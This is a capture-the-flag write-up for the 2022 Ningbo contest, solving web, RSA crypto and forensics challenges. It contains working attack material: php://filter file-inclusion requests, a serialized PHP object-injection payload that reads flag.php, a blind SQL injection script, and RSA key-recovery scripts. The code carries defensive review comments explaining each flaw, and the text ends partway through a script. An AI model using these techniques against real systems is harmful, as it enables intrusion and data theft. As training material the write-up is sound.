【7coin】2022宁波市赛WriteUp



Web

One Two Three

<?php
// Challenge source ("One Two Three"): two request-supplied "files" are compared with fixed
// strings, and when both match a third request-supplied value is include()d.

highlight_file(__FILE__);
error_reporting(0);
include("ans.php");

// All three parameters come straight from the request and are never validated.
if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
   $one = $_GET["one"];
   $two = $_GET["two"];

   $three = $_POST["three"];
   if(!empty($one) && !empty($two) && !empty($three))
   {
       // file_get_contents() accepts stream wrappers as well as paths, so these comparisons
       // do not prove that any file on the server holds the expected text: the client can
       // carry the content inside the parameter itself (the write-up does this with data://).
       if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) ===  "onTh1s")
       {
           var_dump($one);
           // include() on a request-controlled value is a file-inclusion flaw. Through
           // php://filter the target reaches include() base64-encoded, so it is echoed as
           // text instead of being executed, which discloses the source of ans.php.
           // Fix: never pass request input to include(); map a fixed set of keys to file names.
           include($one);
       }
   }
   else
       die("Insufficient Parameters");
}

代码审计,用data伪协议给two和three赋值,利用filter伪协议给one赋值,base64作为处理器读出来

POST /?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b HTTP/1.1
Host: 119.61.19.212:55001
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://119.61.19.212:55001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://119.61.19.212:55001/?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close

three=data%3A%2F%2Ftext%2Fplain%2ConTh1s



base64解码即可

<?php
// Decoded source of ans.php as recovered in the write-up.
print("D0n't try t0 tr1ck me!");
// The value below sits in a comment, so executing the file never sends it; it is exposed
// only when the file's source can be read, which the php://filter include made possible.
// $ans = flag{8aea34fd-a111-677d-a97c-3f5e12fa16e4};

Lesen

<?php
// Challenge source ("Lesen"): includes a request-chosen file, then unserializes request data
// and calls a method on the result.
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
// Falls back to behind.php when a parameter is missing or $from contains "flag".
// NOTE(review): stripos() returns 0 for a match at the start of the string, and 0 != FALSE
// is false under loose comparison, so such a value is not rejected; the strict test is
// stripos(...) !== false. A substring deny-list is in any case weaker than an allow-list
// of permitted file names.
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
   $from = "behind.php";
}

// $from is still request-controlled here, so this is the same file-inclusion pattern:
// a php://filter value makes include() echo the target's source instead of running it.
include($from);// read flag.php

if(isset($to))
{
   // unserialize() on request data builds objects of any loaded class with caller-chosen
   // property values (PHP object injection). Safer: exchange JSON, or call
   // unserialize($to, ['allowed_classes' => false]) so no objects are instantiated.
   $a = unserialize($to);
   // No class in behind.php defines sayTheFlag(), so on a Test object this call is routed
   // to the __call() magic method.
   $a->sayTheFlag();
}

先读behind.php

http://119.61.19.212:55003/?from=php://filter/convert.base64-encode/resource=behind.php&to=


base64解码

<?php
// behind.php: the two classes that are loaded when the challenge page unserializes input.
// Together their magic methods turn a property value into a file read.
error_reporting(0);
class Test
{
       public $notthis;
       public $variable;
       // Invoked for any call to a method the class does not define.
       public function __call($t1, $t2)
       {
           // print() converts its argument to a string; when $notthis is an object this
           // triggers that object's __toString().
           print($this->notthis);
       }

}
class NoUse
{
       public $notthis;
       public $class;
       // Returns the contents of whatever path $notthis holds. After unserialize() the
       // property value is chosen by the sender, so the path is not trustworthy.
       public function __toString()
       {
           return file_get_contents($this->notthis);
       }
}
?>

构造一下,先调call再调tostring,链子比较简单就不赘述了

<?php
 // Builds the serialized object graph that is passed as the "to" parameter. The classes are
 // redeclared with properties and constructors only: serialize() records the class name and
 // the property values, not the methods.
 class Test
 {
         public $notthis;
         public $variable;
         // $notthis holds a NoUse object, which is what Test::__call() will print.
         public function __construct(){
           $this->notthis = new NoUse();
         }
 }
 class NoUse
 {
         public $notthis;
         public $class;
         // The path that NoUse::__toString() hands to file_get_contents().
         public function __construct(){
           $this->notthis = "flag.php";
         }
 }
 // URL-encoded so the string can be placed in a query string unchanged.
 echo urlencode(serialize(new Test()));
?>
O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D

给to传参即可:


GET /?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D HTTP/1.1
Host: 119.61.19.212:55003
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://119.61.19.212:55003/?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close
<?php
// Source of flag.php as returned by the file read. Executing the file only ever prints the
// decoy in die(); the real value is kept in a comment and is visible only in the source.
die("The flag is: flag{Just_K1dd1ng_Wlth_th1s_F4ke_fl4G}")
// The real flag is: flag{9cfb19ea-b219-bfed-09bc-8e1c43fb16f3}
?>

ScoreQuery

前面爆数据库、数据表、字段的没存,原理还是简单的,布尔盲注

import requests
import string

# Boolean-based blind SQL injection against the id parameter, one character per request.
# It works only because the application builds its SQL text from the raw id value; binding
# id as a query parameter (and validating it as an integer) removes the flaw.
# Candidate characters, tried in this order at every position.
flagstr = "1234567890qwertyuiopasdfghjklzxcvbnm}{-"
flag = ''
url = "http://119.61.19.217:55012/"

# substr() positions are 1-based; positions 1 to 44 are probed.
for i in range(1,45):
   for c in flagstr:
       # /**/ stands in for spaces (presumably whitespace is filtered; confirm) and %23 is an
       # encoded '#', which comments out the rest of the original statement.
       tmp = url + "?id=0'/**/or/**/substr((select/**/F1ag/**/from/**/TheFl4g),{},1)='{}'%23".format(i,c)
       res = requests.get(tmp)
       # Oracle: a body of exactly 2263 characters is taken to mean the comparison was true.
       # For defenders: the scan shows up in access logs as long runs of near-identical
       # requests that differ in a single character.
       if len(res.text) == 2263:
           flag += c
           print(flag)
           break



Crypto

CrackCi4er

n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940

n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511

e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614

模不互素

当存在两个公钥的 N 不互素时,我们显然可以直接对这两个数求最大公因数,然后直接获得 p,q,进而获得相应的私钥。

exp:

import gmpy2
import binascii

n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940

n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511

e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614

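# The two moduli share one prime, so a single gcd factors both of them.
# Defensive takeaway: RSA primes must come from independent, well-seeded randomness;
# a prime shared by two keys exposes both private keys to anyone holding the public keys.
p = gmpy2.gcd(n1, n2)
if p == 1 or p == n1 or p == n2:
    # Without a proper common factor the divisions below would produce meaningless keys.
    raise ValueError("n1 and n2 do not share a proper common factor")


def _to_bytes(value):
    """Return the big-endian byte string of a non-negative integer."""
    value = int(value)
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


# First key: n1 = p * q1.
q1 = n1 // p
phi = (p - 1) * (q1 - 1)

d = gmpy2.invert(e1, phi)
m = gmpy2.powmod(c1, d, n1)

# Second key: n2 = p * q2.
q2 = n2 // p
phi = (p - 1) * (q2 - 1)

d2 = gmpy2.invert(e2, phi)
m2 = gmpy2.powmod(c2, d2, n2)

# binascii.unhexlify(hex(m)[2:]) raises when the hex string has an odd number of digits
# (a plaintext whose top nibble is zero); int.to_bytes has no such restriction.
print(_to_bytes(m))
print(_to_bytes(m2))
#flag{0df31ff-b12f-097a-b7ab-fe1a4bfb12e5}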



Cr4ck2

# Challenge source as distributed; the starred values are redacted.
flag = "*************"
p = *************
q = *************

# NOTE(review): as printed, these asserts subtract an int from a str. Presumably
# len(bin(q)) - 2 == 1024 was meant, i.e. both primes are 1024 bits; confirm against
# the original file.
assert(bin(q)-2) == 1024
assert(bin(p)-2) == 1024

n = p*q
phi = (p-1)*(q-1)

e1 = **
e2 = **

# The same value is raised to two different exponents under one modulus, with no padding.
# That reuse is the weakness the write-up exploits (common-modulus attack); randomized
# padding such as OAEP, or a separate modulus per key, prevents it.
c1 = pow(flag, e1, n)
c2 = pow(flag, e2, n)

print(n)
print(e1)
print(e2)
print(c1)
print(c2)

公模攻击exp:

import gmpy2
from Crypto.Util.number import long_to_bytes

n = 14571489544273684681632745165173941757355029852967262639728000988042839386897493030097099884895386115482493694058873038502860513888769546717076461092157274631880422404640774568976816310850151976919429837061384758878560393916832880369835035094654445542998583110983141044252629041042005200028747437532412882541760701913277010315019696176276304794162940731256361777150089869864848752521412637555443729084762017260965056626550279092491606837302796652497491465469860146607791410672793656097187677222298486237121302232907875363012059539134811841994652897489100941594071086553725267695160318463265760189436211892048571831049
e1 = 18181

e2 = 19937

message1 = 14086932244393217502907224674408736488830849146214227184918262698062675736724337554446711585503734671616977407523947180439538475650652413419679106435434870038055027980301567294772290568083578726775663339768961737480740922223388718943787094330870471886171540256870630059797491648906275021947443613254535459415614412289718705188895798826235866579862681303315446414825328707142227744471707921742768342732559562524019443552187374960675403256064296192626351031408014769594350992074453942709110651276633951009115468620886310509692671361261934324842739148921650085982490562922669906835464674323688759465709626540284576889210

message2 = 9788755099571270122752620318833990768386552453915390611782202313009843880011885989102462216813557305415919308702993594866012255516635580308442538867800280824955615413443022611149710694144180395588528536827198061901961298781041399064307258829088210698947995786806886824892341393690873854230422832064661235313593912677068722144241580197984421905987499008664508485233509643273752098892825326153287135195132848517181638343515469682704077797334084053581822968060796475866168907228760199308163970477417979781603099935953389513751241815586854968725454388470460653618696872424888914546835979441528674579794525553550639554293
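# Common-modulus recovery: with s*e1 + t*e2 == 1, c1**s * c2**t == m (mod n).
# It applies only because one unpadded message was encrypted under the same n with two
# coprime exponents; randomized padding or distinct moduli remove the precondition.
gcd, s, t = gmpy2.gcdext(e1, e2)
if gcd != 1:
    # With a larger gcd the combination below would yield m**gcd instead of m.
    raise ValueError("e1 and e2 are not coprime")

# A negative Bezout coefficient is handled by inverting the matching ciphertext modulo n
# and raising the inverse to the absolute value of the coefficient.
if s < 0:
    s = -s
    message1 = gmpy2.invert(message1, n)
if t < 0:
    t = -t
    message2 = gmpy2.invert(message2, n)

plain = gmpy2.powmod(message1, s, n) * gmpy2.powmod(message2, t, n) % n
print(plain)
# Convert to a built-in int before handing the value to long_to_bytes.
print(long_to_bytes(int(plain)))
#flag{afe12ec-c1be-421f-c0fa-ea2f6ceb10a0}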


n_n

ucnd fclsmn.rmjy.irdapc jdsncm zpmscjdp, almph_mn_yniz
ucnd hpfcpm jdsncm uyvz
jdsncm zdsl2

s = zpmscjdp(1024)
x = zpmscjdp(1024)
i = s * x
p = 0g130u7u3
k = zdsl2.jiwpcm(p, (s-1)*(x-1))
jiws_x = zdsl2.jiwpcm(s, x)
jiwx_s = zdsl2.jiwpcm(x, s)

d = almph_mn_yniz(uyvz)
f = zdsl2.snbdnk(d, p, i)

scjim(p)
scjim(k)
scjim(jiws_x)
scjim(jiwx_s)
scjim(f)

'''
19986419
3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
'''

词频修复


from crypto.util.number import getprime, bytes_to_long
import gmpy2


p = getprime(1024)
q = getprime(1024)
n = p * q

e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374


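# Names decoded from the substitution-ciphered listing: jiws_x -> invp_q,
# jiwx_s -> invq_p (kept under the write-up's name invk_p so it matches the solver),
# snbdnk -> powmod.
invp_q = gmpy2.invert(p, q)  # p^-1 mod q
invk_p = gmpy2.invert(q, p)  # q^-1 mod p


d = gmpy2.invert(e, (p - 1) * (q - 1))
# m is bytes_to_long(flag) in the challenge source; the flag import is not part of
# this reconstructed listing.
c = gmpy2.powmod(m, e, n)
print(e)
print(d)
print(invp_q)
print(invk_p)
print(c)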

e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374

Rabin加密exp:

from Crypto.Util.number import long_to_bytes
import gmpy2

e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374

# e*d - 1; the search loop below tries its divisors k and takes key // k as a candidate phi(n).
key = e * d - 1
# Counts the divisors tried; it is incremented by the loop and not read anywhere visible.
cnt = 0


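def solve(x, y, z):
    """Solve ``x*t**2 + y*t + z = 0`` over the integers.

    Returns the pair ``(t1, t2)`` computed with the quadratic formula, using an exact
    integer square root and floor division by ``2*x``.

    Raises:
        ValueError: the discriminant is negative or is not a perfect square.
        ZeroDivisionError: ``x`` is zero.
    """
    from math import isqrt  # local import: exact integer square root from the stdlib

    decode = y ** 2 - 4 * x * z
    # Explicit checks instead of ``assert``: assertions are removed under ``python -O``,
    # which would let a non-square discriminant through silently.
    if decode < 0:
        raise ValueError("discriminant is negative")
    root = isqrt(decode)
    if root * root != decode:
        raise ValueError("discriminant is not a perfect square")
    x1 = (-y + root) // (2 * x)
    x2 = (-y - root) // (2 * x)
    return x1, x2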


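# d was computed as the inverse of e modulo phi(n), so e*d - 1 is a multiple of phi(n).
# Each divisor k of key therefore gives a candidate phi(n); the candidate is accepted when
# the quadratic built from the two leaked inverses has usable integer solutions.
# Defensive takeaway: d and the CRT inverses are private-key material; publishing them is
# equivalent to publishing the factorisation.
for k in range(3, e):
    if key % k != 0:
        continue
    cnt += 1
    phi_n = key // k
    ll = invp_q - 1
    m = invp_q * invk_p - 1 + (invp_q - 1) * (invk_p - 1) - phi_n
    n = (invk_p - 1) * (invp_q * invk_p - 1)
    try:
        k1, k2 = solve(ll, m, n)
        if (invp_q * invk_p - 1) % k1 == 0:
            k2 = (invp_q * invk_p - 1) // k1
        elif (invp_q * invk_p - 1) % k2 == 0:
            k1, k2 = k2, (invp_q * invk_p - 1) // k2
        else:
            # Neither root divides invp_q*invk_p - 1: wrong candidate.
            continue
        p, q = invp_q + k2, invk_p + k1
        N = p * q

        flag = long_to_bytes(pow(c, d, N)).strip()
        print(flag)
        break
    except (AssertionError, ValueError, ZeroDivisionError):
        # A failed candidate is expected and skipped. Only these errors are swallowed,
        # so Ctrl-C and genuine bugs (NameError, TypeError, ...) are no longer hidden
        # the way a bare ``except`` hid them.
        continue
#flag{e171892fdcccfc5b0c390806b975a72c}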



Misc

BlackAndWhite

打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张


脚本如下

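# Every frame, including the white reference (0.png), is read from this one directory.
# The original listing spelled the directory two different ways; it is named once here.
target_dir = 'D:/Users/xxxx/Desktop/target'


def _read_frame(index):
    """Return the raw bytes of frame ``index`` and close the file afterwards."""
    with open('%s/%d.png' % (target_dir, index), 'rb') as fh:
        return fh.read()


white = _read_frame(0)

# One bit per frame: a file byte-identical to the white reference is 0, anything else is 1.
flag = ''.join('0' if _read_frame(i) == white else '1' for i in range(336))

# Eight bits per character, most significant bit first; a trailing partial byte is dropped.
length = len(flag) // 8
ans = ''.join(chr(int(flag[i * 8: (i + 1) * 8], 2)) for i in range(length))

print(ans)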


flag{baaf013d-f3fa-bcbe-00fb-1e1a34bb2af1}

Analyze

PDF文件


base64编码过


VGhlIHBhc3N3b3JkIGlzIG5vdCBqdXN0IGFib3V0IGRlY29kaW5nLCBidXQgYWxzbyBoYWNraW5nIHRoZSBaSVAh
解码之后
The password is not just about decoding, but also hacking the ZIP!

提示爆破,爆破出密码为cr4ck!*

成功解压


使用stegsolve打开图片



拿到flag

flag{abae93fb-c31f-aeaf-91fc-0f1d42ba26e4}

DocDocDoc

打开附件


D:\Users\xxxx\Desktop\Hello Flag\word\media

这个路径下有两张图片


第二张图片,使用tweakpng修改高度为960


打开图片


pvkq{olp281m-m2pk-kmlo-81pl-2o2m08m0pmk1}

位移密码,key=10


flag{ebf281c-c2fa-acbe-81fb-2e2c08c0fca1}

Digtal_plate

流量包报错


提取usbdata脚本

#!/usr/bin/env python
# coding:utf-8

import sys
import os
import numpy as np
import matplotlib.pyplot as plt

# Running pointer position, accumulated by main() from the relative offsets in each report.
mousePositionX = 0
mousePositionY = 0

# Coordinates of the points selected for plotting (main() stores Y negated).
X = []
Y = []

# Scratch file that receives tshark's usbhid.data output; main() deletes it when done.
DataFileName = "usb.dat"
# One entry per line read back from DataFileName.
data = []

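def main():
    """Plot the pointer track recorded in a USB HID capture.

    Expects two command-line arguments: the capture file and which reports to plot
    (``LEFT``, ``RIGHT``, ``MOVE`` or ``ALL``; anything else falls back to ``LEFT``).
    The ``usbhid.data`` field of every packet is extracted with tshark into
    ``DataFileName``, the relative offsets are accumulated into a position, the selected
    points are shown as a scatter plot, and the scratch file is removed afterwards.
    """
    import subprocess  # function-scope import; the file's import block does not include it

    global mousePositionX
    global mousePositionY
    # check argv
    if len(sys.argv) != 3:
        print("Usage : ")
        print("        python UsbMiceHacker.py data.pcap [LEFT|RIGHT|MOVE|ALL]")
        print("Tips : ")
        print("        To use this python script , you must install the numpy,matplotlib first.")
        print("        You can use `sudo pip install matplotlib numpy` to install it")
        print("Author : ")
        print("        WangYihang <[email protected]>")
        print("        If you have any questions , please contact me by email.")
        print("        Thank you for using.")
        sys.exit(1)

    # get argv
    pcapFilePath = sys.argv[1]
    action = sys.argv[2]

    if action not in ("LEFT", "ALL", "RIGHT", "MOVE"):
        action = "LEFT"

    # get data of pcap
    # The capture path is passed to tshark as a single argv element. The original built a
    # shell command line around it, so a file name containing a quote or other shell
    # metacharacters would have been interpreted by the shell.
    tshark_argv = ["tshark", "-r", pcapFilePath, "-T", "fields", "-e", "usbhid.data"]
    print(" ".join(tshark_argv) + " > " + DataFileName)
    try:
        with open(DataFileName, "w") as out:
            subprocess.run(tshark_argv, stdout=out, check=False)
    except FileNotFoundError:
        print("tshark was not found on PATH")
        sys.exit(1)

    # read data
    with open(DataFileName, "r") as f:
        for line in f:
            # Drop only the line terminator; slicing off the last character would also
            # eat a data character when the final line has no newline.
            data.append(line.rstrip("\n"))

    # Which action each value of the first report byte stands for.
    button_names = {"01": "LEFT", "02": "RIGHT", "00": "MOVE"}

    # handle move
    for i in data:
        Bytes = i.split(":")
        # Two report layouts are recognised; they differ in where the X and Y offsets sit.
        if len(Bytes) == 8:
            horizontal = 2  # -
            vertical = 4  # |
        elif len(Bytes) == 4:
            horizontal = 1  # -
            vertical = 2  # |
        else:
            continue
        offsetX = int(Bytes[horizontal], 16)
        offsetY = int(Bytes[vertical], 16)
        # The offsets are signed 8-bit values.
        if offsetX > 127:
            offsetX -= 256
        if offsetY > 127:
            offsetY -= 256
        mousePositionX += offsetX
        mousePositionY += offsetY
        # Record the point when every report is wanted or when this report's button
        # state is the one that was asked for.
        if action == "ALL" or action == button_names.get(Bytes[0]):
            X.append(mousePositionX)
            Y.append(-mousePositionY)

    fig = plt.figure()
    ax1 = fig.add_subplot(111)

    ax1.set_title('[%s]-[%s] Author : WangYihang' % (pcapFilePath, action))
    ax1.scatter(X, Y, c='r', marker='o')
    plt.show()

    # clean temp data (os.remove instead of shelling out to rm)
    os.remove(DataFileName)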

if __name__ == "__main__":
   main()


发现是 数位板流量(前三位是088,后8位是八个0)

判断是数位板上画图


画图脚本

import sys
import os
import numpy as np
import matplotlib.pyplot as plt

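# Each line of usbdata.txt is one HID report written as a hex string. Hex digits 4-7 hold X
# and digits 8-11 hold Y, each as a 16-bit value with the low byte first.
data = []
with open("usbdata.txt", "r") as f:
    for line in f:
        line = line.strip()
        # Skip blank or truncated lines; the original failed on them in int(..., 16).
        if len(line) >= 12:
            data.append(line)

X = []
Y = []
for line in data:
    x = int(line[4:6], 16) + int(line[6:8], 16) * 256
    y = int(line[8:10], 16) + int(line[10:12], 16) * 256
    X.append(x)
    # Y is negated so the scatter plot is not drawn upside down.
    Y.append(-y)

fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()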

画图结果如下


拿到一个key

kaseyd4wi2v3sc518dc84bsa4a96

binwalk -e 出来一个zip文件


解压密码就是上面那个

解压出一个图片


猜测是silenteye解密,解密失败

备注发现异常


写的太轻,提示到数位板画画的时候,会有压力感觉

看一下前面都有

0880应该是标识所以画点的数据应该在后面

有数值的是八位

所以x四位y四位

然后发现后面有0880,0881

两个都导出一下,0880是没按压,0881是按压,把0881为前缀的数据提取出来然后描点就行了

import matplotlib.pyplot as plt
import sys
import numpy as np
import os

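# usbhiddata.txt holds one hex-encoded HID report per line (per the write-up, only the
# reports with the 0881 prefix, i.e. the ones recorded while the pen was pressed).
data = []
with open("usbhiddata.txt", "r") as f:
    for raw in f:
        report = raw.strip()
        # Ignore blank or short lines, which the original tripped over in int(..., 16).
        if len(report) < 12:
            continue
        data.append(report)


def _le16(hex_digits):
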